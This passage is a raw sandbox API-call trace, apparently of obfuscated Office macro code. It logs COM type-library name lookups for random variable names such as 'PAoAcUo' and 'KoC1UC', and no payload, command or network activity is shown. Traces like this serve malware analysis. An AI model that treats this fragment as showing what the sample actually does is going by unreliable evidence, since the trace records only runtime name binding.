lHashVal=0x1040ae, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.598] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="PAoAcUo") returned 0x1040ae [0069.598] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="PAoAcUo" | out: _Dst="PAoAcUo") returned 0x0 [0069.598] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="PAoAcUo") returned 8 [0069.598] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.598] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="PAoAcUo", lHashVal=0x1040ae, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.598] IUnknown:Release (This=0x665ba50) returned 0xd [0069.598] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.598] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="PAoAcUo", lHashVal=0x1040ae, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.598] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.598] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.598] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="PAoAcUo", lHashVal=0x1040ae, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.598] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.598] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.598] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="PAoAcUo", lHashVal=0x1040ae, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.598] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.598] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b811d2, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="PAoAcUo") returned 8 [0069.598] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="PAoAcUo", lHashVal=0x1040ae, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.598] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.598] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b811d2 | out: _Dst=0x67c2d40) returned 0x0 [0069.598] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_PAoAcUo") returned 0x1034b1 [0069.598] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_PAoAcUo" | out: _Dst="_B_var_PAoAcUo") returned 0x0 [0069.598] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_PAoAcUo") returned 15 [0069.598] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.598] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_PAoAcUo", lHashVal=0x1034b1, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.599] IUnknown:Release (This=0x665ba50) returned 0xd [0069.599] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.599] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_PAoAcUo", lHashVal=0x1034b1, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.599] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.599] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.599] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_PAoAcUo", lHashVal=0x1034b1, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.599] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.599] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.599] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_PAoAcUo", lHashVal=0x1034b1, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.599] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.599] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.599] IUnknown:Release (This=0x665ba50) returned 0xd [0069.599] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87037e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_PAoAcUo") returned 15 [0069.599] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_PAoAcUo", lHashVal=0x1034b1, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x50005f00720061, ppTypeComp=0x63004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x50005f00720061, ppTypeComp=0x63004100000000, pDummy=0x0) returned 0x0 [0069.599] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b811d2 | out: _Dst=0x144ec0) returned 0x0 [0069.599] ITypeComp:RemoteBind (in: This=0x665ba60, szName="mAGABAQ", lHashVal=0x10f1d4, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.599] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b811fa, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="mAGABAQ") returned 8 [0069.599] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="mAGABAQ", lHashVal=0x10f1d4, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.599] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b811fa, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="mAGABAQ") returned 8 [0069.599] ITypeComp:RemoteBind (in: This=0x665bd30, szName="mAGABAQ", lHashVal=0x10f1d4, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.599] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="mAGABAQ") returned 0x10f1d4 [0069.599] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="mAGABAQ" | out: _Dst="mAGABAQ") returned 0x0 [0069.600] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="mAGABAQ") returned 8 [0069.600] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.600] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="mAGABAQ", lHashVal=0x10f1d4, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.600] IUnknown:Release (This=0x665ba50) returned 0xd [0069.600] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.600] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="mAGABAQ", lHashVal=0x10f1d4, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.600] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.600] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.600] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="mAGABAQ", lHashVal=0x10f1d4, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.600] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.600] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.600] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="mAGABAQ", lHashVal=0x10f1d4, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.600] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.600] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b811fa, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="mAGABAQ") returned 8 [0069.600] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="mAGABAQ", lHashVal=0x10f1d4, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.600] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.600] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b811fa | out: _Dst=0x67c2d40) returned 0x0 [0069.600] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_mAGABAQ") returned 0x10e5d7 [0069.600] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_mAGABAQ" | out: _Dst="_B_var_mAGABAQ") returned 0x0 [0069.600] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_mAGABAQ") returned 15 [0069.600] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.600] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_mAGABAQ", lHashVal=0x10e5d7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.600] IUnknown:Release (This=0x665ba50) returned 0xd [0069.600] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.600] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_mAGABAQ", lHashVal=0x10e5d7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.600] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.600] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.600] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_mAGABAQ", lHashVal=0x10e5d7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.601] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.601] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.601] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_mAGABAQ", lHashVal=0x10e5d7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.601] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.601] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.601] IUnknown:Release (This=0x665ba50) returned 0xd [0069.601] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa8703ae, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_mAGABAQ") returned 15 [0069.601] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_mAGABAQ", lHashVal=0x10e5d7, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6d005f00720061, ppTypeComp=0x42004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6d005f00720061, ppTypeComp=0x42004100000000, pDummy=0x0) returned 0x0 [0069.601] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b811fa | out: _Dst=0x144ec0) returned 0x0 [0069.601] ITypeComp:RemoteBind (in: This=0x665ba60, szName="KoC1UC", lHashVal=0x106cdd, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.601] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8124a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="KoC1UC") returned 7 [0069.601] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="KoC1UC", lHashVal=0x106cdd, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.601] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8124a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="KoC1UC") returned 7 [0069.601] ITypeComp:RemoteBind (in: This=0x665bd30, szName="KoC1UC", lHashVal=0x106cdd, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.601] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="KoC1UC") returned 0x106cdd [0069.601] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="KoC1UC" | out: _Dst="KoC1UC") returned 0x0 [0069.601] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="KoC1UC") returned 7 [0069.601] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.601] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="KoC1UC", lHashVal=0x106cdd, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.601] IUnknown:Release (This=0x665ba50) returned 0xd [0069.601] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.601] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="KoC1UC", lHashVal=0x106cdd, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.601] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.602] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.602] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="KoC1UC", lHashVal=0x106cdd, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.602] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.602] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.602] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="KoC1UC", lHashVal=0x106cdd, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.602] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.602] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8124a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="KoC1UC") returned 7 [0069.602] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="KoC1UC", lHashVal=0x106cdd, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.602] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.602] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b8124a | out: _Dst=0x67c2d40) returned 0x0 [0069.602] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_KoC1UC") returned 0x10e786 [0069.602] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_KoC1UC" | out: _Dst="_B_var_KoC1UC") returned 0x0 [0069.602] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_KoC1UC") returned 14 [0069.602] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.602] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_KoC1UC", lHashVal=0x10e786, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.602] IUnknown:Release (This=0x665ba50) returned 0xd [0069.602] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.602] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_KoC1UC", lHashVal=0x10e786, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.602] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.602] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.602] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_KoC1UC", lHashVal=0x10e786, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.602] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.602] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.602] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_KoC1UC", lHashVal=0x10e786, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.602] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.602] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.602] IUnknown:Release (This=0x665ba50) returned 0xd [0069.602] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa8703de, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_KoC1UC") returned 14 [0069.602] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_KoC1UC", lHashVal=0x10e786, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4b005f00720061, ppTypeComp=0x55003100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4b005f00720061, ppTypeComp=0x55003100000000, pDummy=0x0) returned 0x0 [0069.603] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b8124a | out: _Dst=0x144ec0) returned 0x0 [0069.603] ITypeComp:RemoteBind (in: This=0x665ba60, szName="BAxoCQA", lHashVal=0x10c3bd, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.603] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81222, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="BAxoCQA") returned 8 [0069.603] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="BAxoCQA", lHashVal=0x10c3bd, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.603] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81222, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="BAxoCQA") returned 8 [0069.603] ITypeComp:RemoteBind (in: This=0x665bd30, szName="BAxoCQA", lHashVal=0x10c3bd, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.603] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="BAxoCQA") returned 0x10c3bd [0069.603] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="BAxoCQA" | out: _Dst="BAxoCQA") returned 0x0 [0069.603] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="BAxoCQA") returned 8 [0069.603] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.603] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="BAxoCQA", lHashVal=0x10c3bd, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.603] IUnknown:Release (This=0x665ba50) returned 0xd [0069.603] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.603] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="BAxoCQA", lHashVal=0x10c3bd, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.603] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.603] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.603] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="BAxoCQA", lHashVal=0x10c3bd, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.603] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.603] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.603] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="BAxoCQA", lHashVal=0x10c3bd, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.603] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.603] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81222, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="BAxoCQA") returned 8 [0069.604] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="BAxoCQA", lHashVal=0x10c3bd, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.604] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.604] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3b81222 | out: _Dst=0x67c2d40) returned 0x0 [0069.604] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_BAxoCQA") returned 0x10c741 [0069.604] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_BAxoCQA" | out: _Dst="_B_var_BAxoCQA") returned 0x0 [0069.604] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_BAxoCQA") returned 15 [0069.604] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.604] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_BAxoCQA", lHashVal=0x10c741, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.604] IUnknown:Release (This=0x665ba50) returned 0xd [0069.604] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.604] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_BAxoCQA", lHashVal=0x10c741, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.604] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.604] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.604] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_BAxoCQA", lHashVal=0x10c741, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.604] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.604] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.604] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_BAxoCQA", lHashVal=0x10c741, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.604] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.604] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.604] IUnknown:Release (This=0x665ba50) returned 0xd [0069.604] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87040e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_BAxoCQA") returned 15 [0069.604] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_BAxoCQA", lHashVal=0x10c741, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x42005f00720061, ppTypeComp=0x43006f00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, 